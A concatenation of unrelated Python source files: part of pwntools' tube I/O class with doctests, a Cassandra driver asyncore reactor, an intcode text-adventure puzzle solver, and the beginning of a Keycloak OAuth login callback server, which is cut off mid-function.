>>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == "Bar\n")
'Bar'
>>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True)
'Bar\n'
>>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1)
''
"""
tmpbuf = Buffer()
line = ''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except Exception:
self.buffer.add(tmpbuf)
raise
if not line:
self.buffer.add(tmpbuf)
return ''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return ''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_contains('r')
'World'
>>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains('pear')
'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(('car', 'train'))
'bicycle car train'
"""
if isinstance(items, (str,unicode)):
items = (items,)
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends = False, timeout = default):
r"""recvline_startswith(delims, keepends = False, timeout = default) -> str
Keep receiving lines until one is found that starts with one of
`delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith(tuple('WXYZ'))
'World'
>>> t.recvline_startswith(tuple('WXYZ'), True)
'Xylophone\n'
>>> t.recvline_startswith('Wo')
'World'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends = False, timeout = default):
r"""recvline_endswith(delims, keepends = False, timeout = default) -> str
Keep receiving lines until one is found that starts with one of
`delims`. Returns the last line received.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith('r')
'Bar'
>>> t.recvline_endswith(tuple('abcde'), True)
'Kaboodle\n'
>>> t.recvline_endswith('oodle')
'Kaboodle'
"""
# Convert string into singleton tupple
if isinstance(delims, (str, unicode)):
delims = (delims,)
delims = tuple(delim + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact = False, timeout = default):
"""recvregex(regex, exact = False, timeout = default) -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepends = False, timeout = default):
"""recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout = default):
"""recvrepeat(timeout = default) -> str
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... 'd',
... '', # simulate timeout
... 'c',
... 'b',
... 'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
'abc'
>>> t.recv()
'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> str
Receives data until EOF is reached.
"""
with self.waitfor('Receiving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
If log level ``DEBUG`` is enabled, also prints out the data
received.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.send('hello')
'hello'
"""
if self.isEnabledFor(logging.DEBUG):
self.debug('Sent %#x bytes:' % len(data))
if len(set(data)) == 1:
self.indented('%r * %#x' % (data[0], len(data)))
elif all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line=''):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline('hello')
'hello\n'
>>> t.newline = '\r\n'
>>> t.sendline('hello')
'hello\r\n'
"""
self.send(line + self.newline)
def sendlines(self, lines=[]):
for line in lines:
self.sendline(line)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout=timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout=timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout=timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.send(data + self.newline)
return self.recvuntil(delim, timeout=timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
Thus it only works in while in :data:`pwnlib.term.term_mode`.
"""
self.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace('\r\n', '\n')
if cur:
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
self.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
self.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def stream(self, line_mode=True):
"""stream()
Receive data until the tube exits, and print it to stdout.
Similar to :func:`interactive`, except that no input is sent.
Similar to ``print tube.recvall()`` except that data is printed
as it is received, rather than after all data is received.
Arguments:
line_mode(bool): Whether to receive line-by-line or raw data.
Returns:
All data printed.
"""
buf = Buffer()
function = self.recvline if line_mode else self.recv
try:
while True:
buf.add(function())
sys.stdout.write(buf.data[-1])
except KeyboardInterrupt:
pass
except EOFError:
pass
return buf.get()
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv('clean me up')
>>> t.clean(0)
'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
data with :meth:`pwnlib.self.info`.
Returns:
All data received
Examples:
>>> def recv(n, data=['', 'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
[DEBUG] Received 0xb bytes:
'hooray_data'
>>> data
'hooray_data'
>>> context.clear()
"""
with context.local(log_level='debug'):
return self.clean(timeout)
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> import time
>>> _=(b.connect_input(a), time.sleep(0.1))
data
"""
def pump():
import sys as _sys
while self.countdown_active():
if not (self.connected('send') and other.connected('recv')):
break
try:
data = other.recv(timeout = 0.05)
except EOFError:
break
if not _sys:
return
if not data:
continue
try:
self.send(data)
except EOFError:
break
if not _sys:
return
self.shutdown('send')
other.shutdown('recv')
t = context.Thread(target = pump)
t.daemon = True
t.start()
def connect_output(self, other):
"""connect_output(other)
Connects the output of this tube to the input of another tube object.
Examples:
>>> def p(x): print x
>>> def recvone(n, data=['data']):
... while data: return data.pop()
... raise EOFError
>>> a = tube()
>>> b = tube()
>>> a.recv_raw = recvone
>>> b.send_raw = p
>>> a.connected_raw = lambda d: True
>>> b.connected_raw = lambda d: True
>>> a.shutdown = lambda d: True
>>> b.shutdown = lambda d: True
>>> _=(a.connect_output(b), time.sleep(0.1))
data
"""
other.connect_input(self)
def connect_both(self, other):
"""connect_both(other)
Connects the both ends of this tube object with another tube object."""
self.connect_input(other)
self.connect_output(other)
def spawn_process(self, *args, **kwargs):
"""Spawns a new process having this tube as stdin, stdout and stderr.
Takes the same arguments as :class:`subprocess.Popen`."""
return subprocess.Popen(
*args,
stdin = self.fileno(),
stdout = self.fileno(),
stderr = self.fileno(),
**kwargs
)
def __lshift__(self, other):
"""
Shorthand for connecting multiple tubes.
See :meth:`connect_input` for more information.
Examples:
The following are equivalent ::
tube_a >> tube.b
tube_a.connect_input(tube_b)
This is useful when chaining multiple tubes ::
tube_a >> tube_b >> tube_a
tube_a.connect_input(tube_b)
tube_b.connect_input(tube_a)
"""
self.connect_input(other)
return other
def __rshift__(self, other):
"""
Inverse of the ``<<`` operator. See :meth:`__lshift__`.
See :meth:`connect_input` for more information.
"""
self.connect_output(other)
return other
def __ne__(self, other):
"""
Shorthand for connecting tubes to eachother.
The following are equivalent ::
a >> b >> a
a <> b
See :meth:`connect_input` for more information.
"""
self << other << self
def wait_for_close(self):
"""Waits until the tube is closed."""
while self.connected():
time.sleep(0.05)
wait = wait_for_close
def can_recv(self, timeout = 0):
"""can_recv(timeout = 0) -> bool
Returns True, if there is data available within `timeout` seconds.
Examples:
>>> import time
>>> t = tube()
>>> t.can_recv_raw = lambda *a: False
>>> t.can_recv()
False
>>> _=t.unrecv('data')
>>> t.can_recv()
True
>>> _=t.recv()
>>> t.can_recv()
False
"""
return bool(self.buffer or self.can_recv_raw(timeout))
def settimeout(self, timeout):
"""settimeout(timeout)
Set the timeout for receiving operations. If the string "default"
is given, then :data:`context.timeout` will be used. If None is given,
then there will be no timeout.
Examples:
>>> t = tube()
>>> t.settimeout_raw = lambda t: None
>>> t.settimeout(3)
>>> t.timeout == 3
True
"""
self.timeout = timeout
shutdown_directions = {
'in': 'recv',
'read': 'recv',
'recv': 'recv',
'out': 'send',
'write': 'send',
'send': 'send',
}
connected_directions = shutdown_directions.copy()
connected_directions['any'] = 'any'
def shutdown(self, direction = "send"):
"""shutdown(direction = "send")
Closes the tube for futher reading or writing depending on `direction`.
Arguments:
direction(str): Which direction to close; "in", "read" or "recv"
closes the tube in the ingoing direction, "out", "write" or "send"
closes it in the outgoing direction.
Returns:
:const:`None`
Examples:
>>> def p(x): print x
>>> t = tube()
>>> t.shutdown_raw = p
>>> _=map(t.shutdown, ('in', 'read', 'recv', 'out', 'write', 'send'))
recv
recv
recv
send
send
send
>>> t.shutdown('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.shutdown_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.shutdown_directions))
else:
self.shutdown_raw(self.shutdown_directions[direction])
def connected(self, direction = 'any'):
"""connected(direction = 'any') -> bool
Returns True if the tube is connected in the specified direction.
Arguments:
direction(str): Can be the string 'any', 'in', 'read', 'recv',
'out', 'write', 'send'.
Doctest:
>>> def p(x): print x
>>> t = tube()
>>> t.connected_raw = p
>>> _=map(t.connected, ('any', 'in', 'read', 'recv', 'out', 'write', 'send'))
any
recv
recv
recv
send
send
send
>>> t.connected('bad_value') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
KeyError: "direction must be in ['any', 'in', 'out', 'read', 'recv', 'send', 'write']"
"""
try:
direction = self.connected_directions[direction]
except KeyError:
raise KeyError('direction must be in %r' % sorted(self.connected_directions))
else:
return self.connected_raw(direction)
def __enter__(self):
"""Permit use of 'with' to control scoping and closing sessions.
Examples:
>>> t = tube()
>>> def p(x): print x
>>> t.close = lambda: p("Closed!")
>>> with t: pass
Closed!
"""
return self
def __exit__(self, type, value, traceback):
"""Handles closing for 'with' statement
See :meth:`__enter__`
"""
self.close()
# The minimal interface to be implemented by a child
def recv_raw(self, numb):
"""recv_raw(numb) -> str
Should not be called directly. Receives data without using the buffer
on the object.
Unless there is a timeout or closed connection, this should always
return data. In case of a timeout, it should return None, in case
of a closed connection it should raise an ``exceptions.EOFError``.
"""
raise EOFError('Not implemented')
def send_raw(self, data):
"""send_raw(data)
Should not be called directly. Sends data to the tube.
Should return ``exceptions.EOFError``, if it is unable to send any
more, because of a close tube.
"""
raise EOFError('Not implemented')
def settimeout_raw(self, timeout):
"""settimeout_raw(timeout)
Should not be called directly. Sets the timeout for
the tube.
"""
raise NotImplementedError()
def timeout_change(self):
"""
Informs the raw layer of the tube that the timeout has changed.
Should not be called directly.
Inherited from :class:`Timeout`.
"""
try:
self.settimeout_raw(self.timeout)
except NotImplementedError:
pass
def can_recv_raw(self, timeout):
"""can_recv_raw(timeout) -> bool
Should not be called directly. Returns True, if
there is data available within the timeout, but
ignores the buffer on the object.
"""
raise NotImplementedError()
def connected_raw(self, direction):
"""connected(direction = 'any') -> bool
Should not be called directly. Returns True iff the
tube is connected in the given direction.
"""
raise NotImplementedError()
def close(self):
"""close()
Closes the tube.
"""
pass
# Ideally we could:
# raise NotImplementedError()
# But this causes issues with the unit tests.
def fileno(self):
"""fileno() -> int
Returns the file number used for reading.
"""
raise NotImplementedError()
def shutdown_raw(self, direction):
"""shutdown_raw(direction)
Should not be called directly. Closes the tube for further reading or
writing.
"""
raise NotImplementedError()
#: Alias for :meth:`recv`
def read(self, *a, **kw): return self.recv(*a, **kw)
#: Alias for :meth:`recvpred`
def readpred(self, *a, **kw): return self.recvpred(*a, **kw)
#: Alias for :meth:`recvn`
def readn(self, *a, **kw): return self.recvn(*a, **kw)
#: Alias for :meth:`recvuntil`
def readuntil(self, *a, **kw): return self.recvuntil(*a, **kw)
#: Alias for :meth:`recvlines`
def readlines(self, *a, **kw): return self.recvlines(*a, **kw)
#: Alias for :meth:`recvline`
def readline(self, *a, **kw): return self.recvline(*a, **kw)
#: Alias for :meth:`recvline_pred`
def readline_pred(self, *a, **kw): return self.recvline_pred(*a, **kw)
#: Alias for :meth:`recvline_contains`
def readline_contains(self, *a, **kw): return self.recvline_contains(*a, **kw)
#: Alias for :meth:`recvline_startswith`
def readline_startswith(self, *a, **kw): return self.recvline_startswith(*a, **kw)
#: Alias for :meth:`recvline_endswith`
def readline_endswith(self, *a, **kw): return self.recvline_endswith(*a, **kw)
#: Alias for :meth:`recvregex`
def readregex(self, *a, **kw): return self.recvregex(*a, **kw)
#: Alias for :meth:`recvline_regex`
def readline_regex(self, *a, **kw): return self.recvline_regex(*a, **kw)
#: Alias for :meth:`recvrepeat`
def readrepeat(self, *a, **kw): return self.recvrepeat(*a, **kw)
#: Alias for :meth:`recvall`
def readall(self, *a, **kw): return self.recvall(*a, **kw)
#: Alias for :meth:`send`
def write(self, *a, **kw): return self.send(*a, **kw)
#: Alias for :meth:`sendline`
def writeline(self, *a, **kw): return self.sendline(*a, **kw)
#: Alias for :meth:`sendafter`
def writeafter(self, *a, **kw): return self.sendafter(*a, **kw)
#: Alias for :meth:`sendlineafter`
def writelineafter(self, *a, **kw): return self.sendlineafter(*a, **kw)
#: Alias for :meth:`sendthen`
def writethen(self, *a, **kw): return self.sendthen(*a, **kw)
#: Alias for :meth:`sendlinethen`
def writelinethen(self, *a, **kw): return self.sendlinethen(*a, **kw)
def p64(self, *a, **kw): return self.send(packing.p64(*a, **kw))
def p32(self, *a, **kw): return self.send(packing.p32(*a, **kw))
def p16(self, *a, **kw): return self.send(packing.p16(*a, **kw))
def p8(self, *a, **kw): return self.send(packing.p8(*a, **kw))
def pack(self, *a, **kw): return self.send(packing.pack(*a, **kw))
def u64(self, *a, **kw): return packing.u64(self.recvn(8), *a, **kw)
def u32(self, *a, **kw): return packing.u32(self.recvn(4), *a, **kw)
def u16(self, *a, **kw): return packing.u16(self.recvn(2), *a, **kw)
def u8(self, *a, **kw): return packing.u8(self.recvn(1), *a, **kw)
def unpack(self, *a, **kw): return packing.unpack(self.recvn(context.bytes), *a, **kw)
def flat(self, *a, **kw): return self.send(packing.flat(*a,**kw))
def fit(self, *a, **kw): return self.send(packing.fit(*a, **kw))
|
asyncorereactor.py
|
# Copyright 2013-2015 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import sys
from threading import Event, Lock, Thread
import weakref
from six.moves import range
from errno import EALREADY, EINPROGRESS, EWOULDBLOCK, EINVAL, EISCONN, errorcode
try:
from weakref import WeakSet
except ImportError:
from cassandra.util import WeakSet # noqa
import asyncore
try:
import ssl
except ImportError:
ssl = None # NOQA
from cassandra import OperationTimedOut
from cassandra.connection import (Connection, ConnectionShutdown,
ConnectionException, NONBLOCKING)
from cassandra.protocol import RegisterMessage
log = logging.getLogger(__name__)
def _cleanup(loop_weakref):
try:
loop = loop_weakref()
except ReferenceError:
return
loop._cleanup()
class AsyncoreLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop_lock = Lock()
self._started = False
self._shutdown = False
self._conns_lock = Lock()
self._conns = WeakSet()
self._thread = None
atexit.register(partial(_cleanup, weakref.ref(self)))
def maybe_start(self):
should_start = False
did_acquire = False
try:
did_acquire = self._loop_lock.acquire(False)
if did_acquire and not self._started:
self._started = True
should_start = True
finally:
if did_acquire:
self._loop_lock.release()
if should_start:
self._thread = Thread(target=self._run_loop, name="cassandra_driver_event_loop")
self._thread.daemon = True
self._thread.start()
def _run_loop(self):
log.debug("Starting asyncore event loop")
with self._loop_lock:
while True:
try:
asyncore.loop(timeout=0.001, use_poll=True, count=1000)
except Exception:
log.debug("Asyncore event loop stopped unexepectedly", exc_info=True)
break
if self._shutdown:
break
with self._conns_lock:
if len(self._conns) == 0:
break
self._started = False
log.debug("Asyncore event loop ended")
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
log.debug("Waiting for event loop thread to join...")
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def connection_created(self, connection):
with self._conns_lock:
self._conns.add(connection)
def connection_destroyed(self, connection):
with self._conns_lock:
self._conns.discard(connection)
class AsyncoreConnection(Connection, asyncore.dispatcher):
"""
An implementation of :class:`.Connection` that uses the ``asyncore``
module in the Python standard library for its event loop.
"""
_loop = None
_total_reqd_bytes = 0
_writable = False
_readable = False
@classmethod
def initialize_reactor(cls):
if not cls._loop:
cls._loop = AsyncoreLoop()
else:
current_pid = os.getpid()
if cls._loop._pid != current_pid:
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
cls._loop = AsyncoreLoop()
@classmethod
def handle_fork(cls):
if cls._loop:
cls._loop._cleanup()
cls._loop = None
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
asyncore.dispatcher.__init__(self)
self.connected_event = Event()
self._callbacks = {}
self.deque = deque()
self.deque_lock = Lock()
self._loop.connection_created(self)
sockerr = None
addresses = socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM)
for (af, socktype, proto, canonname, sockaddr) in addresses:
try:
self.create_socket(af, socktype)
self.connect(sockaddr)
sockerr = None
break
except socket.error as err:
sockerr = err
if sockerr:
raise socket.error(sockerr.errno, "Tried connecting to %s. Last error: %s" % ([a[4] for a in addresses], sockerr.strerror))
self.add_channel()
if self.sockopts:
for args in self.sockopts:
self.socket.setsockopt(*args)
self._writable = True
self._readable = True
# start the event loop if needed
self._loop.maybe_start()
def set_socket(self, sock):
# Overrides the same method in asyncore. We deliberately
# do not call add_channel() in this method so that we can call
# it later, after connect() has completed.
self.socket = sock
self._fileno = sock.fileno()
def create_socket(self, family, type):
# copied from asyncore, but with the line to set the socket in
# non-blocking mode removed (we will do that after connecting)
self.family_and_type = family, type
sock = socket.socket(family, type)
if self.ssl_options:
if not ssl:
raise Exception("This version of Python was not compiled with SSL support")
sock = ssl.wrap_socket(sock, **self.ssl_options)
self.set_socket(sock)
def connect(self, address):
# this is copied directly from asyncore.py, except that
# a timeout is set before connecting
self.connected = False
self.connecting = True
self.socket.settimeout(1.0)
err = self.socket.connect_ex(address)
if err in (EINPROGRESS, EALREADY, EWOULDBLOCK) \
or err == EINVAL and os.name in ('nt', 'ce'):
raise ConnectionException("Timed out connecting to %s" % (address[0]))
if err in (0, EISCONN):
self.addr = address
self.socket.setblocking(0)
self.handle_connect_event()
else:
raise socket.error(err, os.strerror(err))
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.host)
self._writable = False
self._readable = False
asyncore.dispatcher.close(self)
log.debug("Closed socket to %s", self.host)
self._loop.connection_destroyed(self)
if not self.is_defunct:
self.error_all_callbacks(
ConnectionShutdown("Connection to %s was closed" % self.host))
# don't leave in-progress operations hanging
self.connected_event.set()
def handle_connect(self):
self._send_options_message()
def handle_error(self):
self.defunct(sys.exc_info()[1])
def handle_close(self):
log.debug("Connection %s closed by server", self)
self.close()
def handle_write(self):
while True:
with self.deque_lock:
try:
next_msg = self.deque.popleft()
except IndexError:
self._writable = False
return
try:
sent = self.send(next_msg)
self._readable = True
except socket.error as err:
if (err.args[0] in NONBLOCKING):
with self.deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self.deque_lock:
self.deque.appendleft(next_msg[sent:])
if sent == 0:
return
def handle_read(self):
try:
while True:
buf = self.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] not in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
self.defunct(err)
return
elif err.args[0] not in NONBLOCKING:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
if not self._callbacks and not self.is_control_connection:
self._readable = False
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self.deque_lock:
self.deque.extend(chunks)
self._writable = True
def writable(self):
return self._writable
def readable(self):
return self._readable or (self.is_control_connection and not (self.is_defunct or self.is_closed))
def register_watcher(self, event_type, callback, register_timeout=None):
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=[event_type]), timeout=register_timeout)
def register_watchers(self, type_callback_dict, register_timeout=None):
for event_type, callback in type_callback_dict.items():
self._push_watchers[event_type].add(callback)
self.wait_for_response(
RegisterMessage(event_list=type_callback_dict.keys()), timeout=register_timeout)
|
1.py
|
#!/usr/bin/env python3
import intcode
import queue
import threading
import itertools
excluded_items = {
"giant electromagnet",
"molten lava",
"infinite loop",
"escape pod",
"photons"
}
directions = {
"east": "west",
"west": "east",
"south": "north",
"north": "south"
}
security_checkpoint = "Security Checkpoint"
def play(computer):
room = None
doors = []
items = []
while True:
text = computer.get_decoded_output()
if text is None:
return room, doors, items
print(text)
if text == "Command?":
return room, doors, items
if text.startswith("== "):
room = text.strip("= ")
elif text.startswith("- "):
x = text.strip("- ")
if x in directions:
doors.append(x)
else:
items.append(x)
def explore(computer, trace):
room, doors, items = play(computer)
if room in trace:
return []
trace.append(room)
moves = []
for item in items:
if item in excluded_items:
continue
command("take " + item, computer)
play(computer)
if room == security_checkpoint:
doors.remove("north")
for door in doors:
moves.append((room, door))
command(door, computer)
moves.extend(explore(computer, trace))
moves.append((room, directions[door]))
command(directions[door], computer)
play(computer)
return moves
def command(cmd, computer):
print(">>> " + cmd)
computer.input_text(cmd + "\n")
def goto(room, moves, computer):
for r, m in moves:
if r == room:
return
command(m, computer)
play(computer)
def spoof_identity(computer):
command("inv", computer)
_, _, items = play(computer)
for item in items:
command("drop " + item, computer)
play(computer)
item_combos = sum([list(itertools.combinations(items, i)) for i in range(1, len(items) + 1)], [])
for combo in item_combos:
for item in combo:
command("take " + item, computer)
play(computer)
command("north", computer)
room, _, _ = play(computer)
if room != security_checkpoint:
return
for item in combo:
command("drop " + item, computer)
play(computer)
def deploy_droid():
computer = intcode.Computer(intcode.load_program("input"), intcode.PipeIOHandler(queue.Queue(), queue.Queue()))
t = threading.Thread(target=computer.execute)
t.start()
moves = explore(computer, [])
goto(security_checkpoint, moves, computer)
spoof_identity(computer)
t.join()
deploy_droid()
|
web.py
|
import os
from http.server import BaseHTTPRequestHandler, HTTPServer
from socket import AF_INET, SOCK_STREAM, gethostbyname, socket
from threading import Thread
from urllib.parse import parse_qs
from oic.oic import AccessTokenResponse, AuthorizationResponse, Client
from src.authentication.types import AuthenticationData
from src.cli import console
from src.context import ClickContext
CALLBACK_PORT_RANGE = range(44444, 44448)
def get_callback_port() -> int:
t_IP = gethostbyname("localhost")
for port in CALLBACK_PORT_RANGE:
conn = (s := socket(AF_INET, SOCK_STREAM)).connect_ex((t_IP, port))
s.close()
if conn:
break
else:
raise Exception("No port in the range 44444-44447 is available.")
return port
def run_callback_server(state: str, nonce: str, client: Client, ctx: ClickContext) -> int:
class CallbackHandler(BaseHTTPRequestHandler):
"""
This handles the redirect from the Keycloak after the web login.
A simple http server is started when the user is sent to the keycloak
web frontend to authenticate.
"""
def get_post_data(self) -> dict:
post_body = self.rfile.read(int(self.headers.get("content-length", 0)))
return {k.decode(): v[0].decode() for k, v in parse_qs(post_body).items()}
def send_text_response(self, response_body):
self.send_response(200)
self.send_header("Content-Type", "text/html")
self.send_header("Content-Length", str(len(response_body)))
self.end_headers()
self.wfile.write(response_body)
def do_POST(self):
POST = self.get_post_data()
if POST["state"] != state:
raise Exception(f"Invalid state: {POST['state']}")
response = ctx.auth._get_requesting_party_token(POST["access_token"])
login_file = open(os.path.join(os.path.dirname(os.path.realpath(__file__)), "login.html"))
text = login_file.read()
login_file.close()
# select response
if not response["success"]:
console.error("Login failed!")
text = (
"Login failed! Could not retrieve requesting party token. "
"Please try again or contact your System administrator"
)
else:
try:
token = ctx.auth.token_from_response(response)
except Exception as e:
console.debug(e)
console.debug(response)
console.error("Login failed!")
text = "Login failed! Your token does not match."
else:
ctx.auth.general_data.authentication = AuthenticationData(
email=token["email"],
access_token=response["response"]["access_token"],
refresh_token=response["response"]["refresh_token"],
requesting_party_token=True,
)
ctx.auth.local_storage_general.set(ctx.auth.general_data)
if given_name := token.get("given_name", ""):
greeting = f"Hello {given_name}!"
else:
greeting = "Hello!"
html_close = "close"
text_html = (
f"You have successfully logged in. You can {html_close} this browser tab and return "
f"to the shell."
)
text_plain = (
"You have successfully logged in. You can close this browser tab and return to the shell."
)
greeting_text = "{greeting} {text}".format(greeting=greeting, text=text_plain)
greeting_html = "{greeting} {text}".format(greeting=greeting, text=text_html)
